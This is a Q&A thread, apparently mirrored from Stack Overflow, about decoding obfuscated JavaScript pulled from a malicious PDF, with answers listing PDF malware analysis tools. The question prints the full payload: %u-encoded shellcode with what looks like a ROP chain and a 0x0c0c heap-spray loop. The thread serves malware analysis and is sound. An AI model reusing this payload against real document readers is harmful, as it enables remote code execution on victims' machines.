Extract JavaScript from malicious PDF
Asked Answered
F

3

6

I have a PDF file that I know for a fact contains a JavaScript script file that does something malicious, not really sure what at this point.

I have successfully uncompressed the PDF file and gotten the plaintext JavaScript source code, but it the code itself if kind of hidden in this syntax I haven't seen before.

Code example: This is what the majority of the code looks like

var bDWXfJFLrOqFuydrq = unescape;
var QgFjJUluesCrSffrcwUwOMzImQinvbkaPVQwgCqYCEGYGkaGqery = bDWXfJFLrOqFuydrq( '%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692....')

I imagine that this notation with long variable/function names and hidden text characters is to confuse scanners that look for these type of things.

Two questions:

Question 1

Can someone tell me what this is called with the %u4141?

Question 2

Is there some tool that will translate that notation into plaintext so I can see what it is doing?

Full JS code:

var B = unescape('%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uadba%u8e19%uda62%ud9cb%u2474%u58f4%uc931%u49b1%u5031%u8314%ufce8%u5003%u4f10%u72ec%u068a%u8b0f%u784b%u6e99%uaa7a%ufbfd%u7a2f%ua975%uf1c3%u5adb%u7757%u6df4%u3dd0%u4322%uf0e1%u0fea%u9321%u4d96%u7376%u9da6%u728b%uc0ef%u2664%u8fb8%ud6d7%ud2cd%ud7eb%u5901%uaf53%u9e24%u0520%ucf26%u1299%uf760%u7c92%u0651%u9f76%u41ad%u6bf3%u5045%ua2d5%u62a6%u6819%u4a99%u7194%u6ddd%u0447%u8e15%u1efa%uecee%uab20%u57f3%u0ba2%u66d0%ucd67%u6593%u9acc%u69fc%u4fd3%u9577%u6e58%u1f58%u541a%u7b7c%uf5f8%u2125%u0aaf%u8d35%uae10%u3c3d%uc844%u291f%ue6a9%ua99f%u71a5%u9bd3%u296a%u907b%uf7e3%ud77c%u4fd9%u2612%uafe2%ued3a%uffb6%uc454%u94b6%ue9a4%u3a62%u45f5%ufadd%u25a5%u928d%ua9af%u82f2%u63cf%u289b%ue435%u0464%ufd34%u560c%ue837%udf7f%u78d1%u8990%u154a%u9009%u8401%u0fd6%u866c%ua35d%u4990%uce96%u3e82%u8556%ue9f9%u3069%u1597%ubefc%u413e%ubc68%ua567%u3f37%ubd42%ud5fe%uaa2d%u39fe%u2aae%u53a9%u42ae%u070d%u77fd%u9252%u2b91%u1cc7%u98c0%u7440%uc7ee%udba7%u2211%u2036%u0bc4%u50bc%u7862%u417c');

var C = unescape("%"+"u"+"0"+"c"+"0"+"c"+"%u"+"0"+"c"+"0"+"c");

while (C.length + 20 + 8 < 65536) C+=C;

D = C.substring(0, (0x0c0c-0x24)/2);

D += B;
D += C;
E = D.substring(0, 65536/2);
while(E.length < 0x80000) E += E;
F = E.substring(0, 0x80000 - (0x1020-0x08) / 2);
var G = new Array();
for (H=0;H<0x1f0;H++) G[H]=F+"s";​
Fulgurous answered 19/4, 2012 at 1:37 Comment(7)
Is there more js code, except these two var ... lines?Elvyn
Yeah there is more, but I didn't want to crowd the post, I will post it now. After examining it I don't really see anything that is malicious. It must have just set AVAST off when it started executing from inside of the PDF. I also renamed all of the variables so that they don't hurt your brain to look at.Fulgurous
It looks like you have already extracted the JavaScript from the PDF. You problem seems to be with the analyzing of this JavaScript, or?Ailssa
@pipitas Correct, I significantly cleaned up the code before posting it here. Every single variable above was at least 32 characters long, and also the unescape function was aliased in another variable. I can't really tell what this is doing, but it doesn't appear malicious to me.Fulgurous
Is this the complete Javascript code?!? Very often, more parts of Javascript are hidden inside the PDF at different places... Does the container-PDF make use of object streams (/ObjStm)?Ailssa
@pipitas this is only block that contains any Javascript in the whole file.Fulgurous
@HunterMcMillen: You should use qpdf to uncompress all compressed streams and also disable object streams using this command: qpdf --qdf --object-streams=disable malicious.pdf malicious-uncompressed.pdf. -- Then you can be (more) sure you'll discover all instances of JavaScript (unless a bug in QPDF fails to really generated a high-fidelity clone of the original PDF).Ailssa
P
1

Those could be memory addresses, OS calls, heap spraying, anything.

The clue is that the function that is called is unescape. To get the actual values you want to unescape that text. There are online tools for unescaping text, such as http://www.web-code.org/coding-tools/javascript-escape-unescape-converter-tool.html.

The result will likely be garbage in ASCII, but you can try plugging it into a hex editor to see if you can make any more sense out of it. if a virus scanner can identify the infection source of that file, maybe you can do more research on that particular malware and figure out what that code is doing.

In the interest of science, fire up a Windows VM, run it, and see what it does :)

Puiia answered 19/4, 2012 at 1:43 Comment(2)
Thank you for the link. As @steveax says the document is made up entirely of those characters. Thank you.Fulgurous
@steveax Ha, yea I bet 80% of those characters are going to look like that. Which is why the data needs to be inspected in a hex editor.Puiia
A
21

It looks like you have already extracted the JavaScript from the PDF. Your problem seems to be with analyzing of this JavaScript.

Since this topic (obfuscating and hiding malicious JavaScript code in harmlessly looking PDF files) seems to becoming more and more popular with malware authors, let me list some tools and websites which proofed to be helpful to anyone who's a beginner in dissecting this type of threats:

  1. Didier Stevens' PDF-Tools
  2. Part 1 (of many) of Didier Stevens' PDF Malware Screencasts (on YouTube)
  3. Jay Berkenbilt's QPDF: utility for content-preserving PDF transformations (useful command to unpack all/most compressed objects inside a PDF:
    qpdf --qdf original.pdf unpacked.pdf
    then open unpacked.pdf in text editor)
  4. Julia Wolf's presentation about PDF malware obfuscation
  5. peepdf: A Python tool to explore PDFs (find out if they are malicious)
  6. PDFTricks: a (non-exhaustive) list of PDF source code obfuscation methods
  7. Wepawet: online resource to analayse PDF/Javascript/Flash files (generates a report)
  8. Origami-PDF: Ruby tool to analyze and generate malicious PDFs
  9. (... many more resources not listed here...)

I don't know how exactly you extracted the Javascript snippet you provided in your question. But, by all means, don't rely on having found all of the JS code inside the PDF -- unless you are a PDF expert who knows where to look and how to uncover all possible obfuscations. (I recommend you apply tool No. 3 to your source PDF and look at the resulting PDF in the light of the tipps in No. 6... The other tools may need some more studying of PDF syntax before you can really make them useful to you.)


Update

Here is an update to my (almost 3 years) old answer. It's worth while to add:

  1. pdfinfo -js: the most recent (Poppler-based!, not XPDF-based) versions of pdfinfo (starting with v0.25.0, released Dec 11, 2013) now know the -js command line parameter which prints out the JavaScript code embedded in a PDF file.

    This works even for many cases were the /JavaScript name within the PDF source code is obfuscated by using (formally legal) PDF name constructs such as /4Aavascript or /J#61v#61script or similar.

    Unfortunately, this marvelous feature addition to pdfinfo is still known much too little. Please share!

Update 2

Another update, because the above mentioned peepdf tool recently got the extract sub-command added:

  1. peepdf.js: This is a Python-based command line tool which can analyse PDF files. It was developed by Jose Miguel Esparza mainly in order to "find out if the file can be harmful or not", but is also very good for general exploration of PDF file structures.

    Installation and usage:

    1. Clone the GitHub repository:
      git clone https://github.com/jesparza/peepdf git.peepdf.
    2. Create a symlink to the peepdf.py script and put it somewhere into your $PATH:
      cd git.clone ;
      ln -s $(pwd)/peepdf.py ${HOME}/bin/peepdf.py
    3. Run it in interactive mode, opening a PDF file:
      peepdf.py -fil my.pdf
    4. Use the extract js > all-js-in-my.pdf command to extract and redirect all JavaScript contained in my.pdf into a file. This is depicted by the screenshots below:

Ailssa answered 19/4, 2012 at 16:8 Comment(1)
@Kurt Pfeifle Thank you for this list. Do you have any suggestions around disarming PDFs? I know PDFiD has an option. Does flattening a PDF have the same effect for disarming?Corbel
P
1

Those could be memory addresses, OS calls, heap spraying, anything.

The clue is that the function that is called is unescape. To get the actual values you want to unescape that text. There are online tools for unescaping text, such as http://www.web-code.org/coding-tools/javascript-escape-unescape-converter-tool.html.

The result will likely be garbage in ASCII, but you can try plugging it into a hex editor to see if you can make any more sense out of it. if a virus scanner can identify the infection source of that file, maybe you can do more research on that particular malware and figure out what that code is doing.

In the interest of science, fire up a Windows VM, run it, and see what it does :)

Puiia answered 19/4, 2012 at 1:43 Comment(2)
Thank you for the link. As @steveax says the document is made up entirely of those characters. Thank you.Fulgurous
@steveax Ha, yea I bet 80% of those characters are going to look like that. Which is why the data needs to be inspected in a hex editor.Puiia
W
0

Following Gem will help to find out whether the pdf file has some malicious code. It will return an error message along with in which policy code has failed.

Ex: For JS it will return an error message with an error policy as allowJSAtOpening if there is JS written into the file.

https://rubygems.org/gems/pdf_scanner

Wingback answered 23/2, 2023 at 4:47 Comment(0)

© 2022 - 2024 — McMap. All rights reserved.